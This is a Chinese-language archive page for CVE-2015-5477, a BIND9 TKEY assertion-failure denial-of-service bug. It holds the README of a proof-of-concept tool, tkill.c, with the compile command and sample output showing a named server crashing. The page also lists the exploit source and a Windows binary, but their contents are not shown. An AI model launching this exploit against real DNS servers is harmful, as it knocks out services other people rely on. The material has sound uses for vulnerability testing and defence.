关联漏洞
标题:ISC BIND 拒绝服务漏洞 (CVE-2015-5477)Description:ISC BIND是美国Internet Systems Consortium(ISC)公司所维护的一套实现了DNS协议的开源软件。 ISC BIND 9.9.7-P1及之前版本和9.10.2-P2及之前版本的named中存在安全漏洞。远程攻击者可借助TKEY查询利用该漏洞造成拒绝服务(REQUIRE断言失败和守护进程退出)。
Description
PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure
介绍
# PoC for BOND9 TKEY assert DoS (CVE-2015-5477)
This exploit tests to see if a BIND9 server is vulnerable by sending
the exploit in order to see if it crashes.
It's C code that you compile the normal way on Unix/Window, such as:
# gcc tkill.c -o tkill
It'll run over both IPv4 and IPv6.
This is what it looks like running against `localhost`. Since it gets
two IP addresses resolving the name, it'll try both of them.
It first queries the "version" string, then sends the exploit.
When it probes the second address, the version query fails because
the service is already crashed from the first attempt.
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
文件快照
[4.0K] /data/pocs/582eacfe39ed9715680c70a703aa3ee384a2424e
├── [4.0K] bin
│ └── [ 10K] win32-tkill.exe
├── [1.3K] README.md
└── [ 13K] tkill.c
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →